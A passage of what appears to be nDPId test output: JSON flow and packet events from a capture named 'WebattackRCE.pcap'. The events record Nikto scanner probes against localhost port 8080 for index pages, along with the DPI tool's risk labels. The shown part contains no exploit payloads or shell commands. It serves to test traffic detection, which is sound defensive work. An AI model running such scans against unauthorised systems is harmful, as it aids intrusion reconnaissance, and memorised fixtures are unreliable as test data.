{"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:headers: BREACH Test)"}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":89,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276801,"flow_last_seen":1576420276801,"flow_idle_time":7440000,"flow_min_l4_payload_len":123,"flow_max_l4_payload_len":123,"flow_tot_l4_payload_len":123,"flow_avg_l4_payload_len":123,"midstream":1,"thread_ts_msec":1576420276801,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49720,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00639{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":89,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":89,"flow_packet_id":1,"flow_last_seen":1576420276801,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":189,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":189,"pkt_l4_len":155,"thread_ts_msec":1576420276801,"pkt":"AAAAAAAAAAAAAAAACABFAACv4YVAAEAGWsF\/AAABfwAAAcI4H5Af9dm0Z318ZoAYAED+owAAAQEICp1m+2mdZvtpR0VUIC8gSFRUUC8xLjANCk5pa3RvOiAfDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6QFRFU1RJRCkNCg0K"} -00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":89,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276801,"flow_last_seen":1576420276801,"flow_idle_time":7440000,"flow_min_l4_payload_len":123,"flow_max_l4_payload_len":123,"flow_tot_l4_payload_len":123,"flow_avg_l4_payload_len":123,"midstream":1,"thread_ts_msec":1576420276801,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49720,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":90,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276803,"flow_last_seen":1576420276803,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276803,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49722,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":90,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":90,"flow_packet_id":1,"flow_last_seen":1576420276803,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"thread_ts_msec":1576420276803,"pkt":"AAAAAAAAAAAAAAAACABFAADGlY9AAEAGpqB\/AAABfwAAAcI6H5C5Ma2+n2Qvb4AYAED+ugAAAQEICp1m+2udZvtrR0VUIC9pbmRleC5waHAgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDptdWx0aXBsZV9pbmRleCkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":90,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276803,"flow_last_seen":1576420276803,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276803,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49722,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":91,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276804,"flow_last_seen":1576420276804,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420276804,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49724,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":91,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":91,"flow_packet_id":1,"flow_last_seen":1576420276804,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1576420276804,"pkt":"AAAAAAAAAAAAAAAACABFAADHUClAAEAG7AV\/AAABfwAAAcI8H5AXCWgXkPGhe4AYAED+uwAAAQEICp1m+2ydZvtsR0VUIC9pbmRleC5waHAzIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDptdWx0aXBsZV9pbmRleCkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":91,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276804,"flow_last_seen":1576420276804,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420276804,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49724,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php3","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":92,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276806,"flow_last_seen":1576420276806,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420276806,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49726,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":92,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":92,"flow_packet_id":1,"flow_last_seen":1576420276806,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1576420276806,"pkt":"AAAAAAAAAAAAAAAACABFAADHuG9AAEAGg79\/AAABfwAAAcI+H5DOCYBdLPnSzYAYAED+uwAAAQEICp1m+26dZvtuR0VUIC9pbmRleC5waHA0IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6bXVsdGlwbGVfaW5kZXgpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":92,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276806,"flow_last_seen":1576420276806,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420276806,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49726,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php4","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":93,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276807,"flow_last_seen":1576420276807,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420276807,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49728,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":93,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":93,"flow_packet_id":1,"flow_last_seen":1576420276807,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1576420276807,"pkt":"AAAAAAAAAAAAAAAACABFAADHnVlAAEAGntV\/AAABfwAAAcJAH5BrmKVmTh6XdYAYAED+uwAAAQEICp1m+2+dZvtvR0VUIC9pbmRleC5waHA1IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6bXVsdGlwbGVfaW5kZXgpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":93,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276807,"flow_last_seen":1576420276807,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420276807,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49728,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php5","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":94,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276809,"flow_last_seen":1576420276809,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420276809,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49730,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":94,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":94,"flow_packet_id":1,"flow_last_seen":1576420276809,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1576420276809,"pkt":"AAAAAAAAAAAAAAAACABFAADHz9VAAEAGbFl\/AAABfwAAAcJCH5Dtpvfi4owoVYAYAED+uwAAAQEICp1m+3GdZvtwR0VUIC9pbmRleC5waHA3IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6bXVsdGlwbGVfaW5kZXgpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":94,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276809,"flow_last_seen":1576420276809,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420276809,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49730,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php7","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":95,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276810,"flow_last_seen":1576420276810,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420276810,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49732,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":95,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":95,"flow_packet_id":1,"flow_last_seen":1576420276810,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1576420276810,"pkt":"AAAAAAAAAAAAAAAACABFAADH5lRAAEAGVdp\/AAABfwAAAcJEH5B9+95hKQN6FIAYAED+uwAAAQEICp1m+3KdZvtyR0VUIC9pbmRleC5odG1sIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDptdWx0aXBsZV9pbmRleCkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":95,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276810,"flow_last_seen":1576420276810,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420276810,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49732,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.html","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":96,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276812,"flow_last_seen":1576420276812,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276812,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49734,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":96,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":96,"flow_packet_id":1,"flow_last_seen":1576420276812,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"thread_ts_msec":1576420276812,"pkt":"AAAAAAAAAAAAAAAACABFAADGlhlAAEAGphZ\/AAABfwAAAcJGH5DYta4lttm384AYAED+ugAAAQEICp1m+3OdZvtzR0VUIC9pbmRleC5odG0gSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0Om11bHRpcGxlX2luZGV4KQ0KDQo="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":96,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276812,"flow_last_seen":1576420276812,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276812,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49734,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.htm","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":97,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276813,"flow_last_seen":1576420276813,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276813,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49736,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00675{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":97,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":97,"flow_packet_id":1,"flow_last_seen":1576420276813,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420276813,"pkt":"AAAAAAAAAAAAAAAACABFAADI2h9AAEAGYg5\/AAABfwAAAcJIH5At6uIveFvtbIAYAED+vAAAAQEICp1m+3WdZvt1R0VUIC9pbmRleC5zaHRtbCBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0Om11bHRpcGxlX2luZGV4KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01063{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":97,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276813,"flow_last_seen":1576420276813,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276813,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49736,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.shtml","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":98,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276815,"flow_last_seen":1576420276815,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276815,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49738,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":98,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":98,"flow_packet_id":1,"flow_last_seen":1576420276815,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"thread_ts_msec":1576420276815,"pkt":"AAAAAAAAAAAAAAAACABFAADGtzZAAEAGhPl\/AAABfwAAAcJKH5BukY8IX6sJe4AYAED+ugAAAQEICp1m+3edZvt2R0VUIC9pbmRleC5jZm0gSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDptdWx0aXBsZV9pbmRleCkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":98,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276815,"flow_last_seen":1576420276815,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276815,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49738,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.cfm","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":99,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276817,"flow_last_seen":1576420276817,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276817,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49740,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00672{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":99,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":99,"flow_packet_id":1,"flow_last_seen":1576420276817,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"thread_ts_msec":1576420276817,"pkt":"AAAAAAAAAAAAAAAACABFAADGzfJAAEAGbj1\/AAABfwAAAcJMH5CEyfXFi\/ZWqoAYAED+ugAAAQEICp1m+3mdZvt5R0VUIC9pbmRleC5jZ2kgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0Om11bHRpcGxlX2luZGV4KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":99,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276817,"flow_last_seen":1576420276817,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276817,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49740,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.cgi","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}} 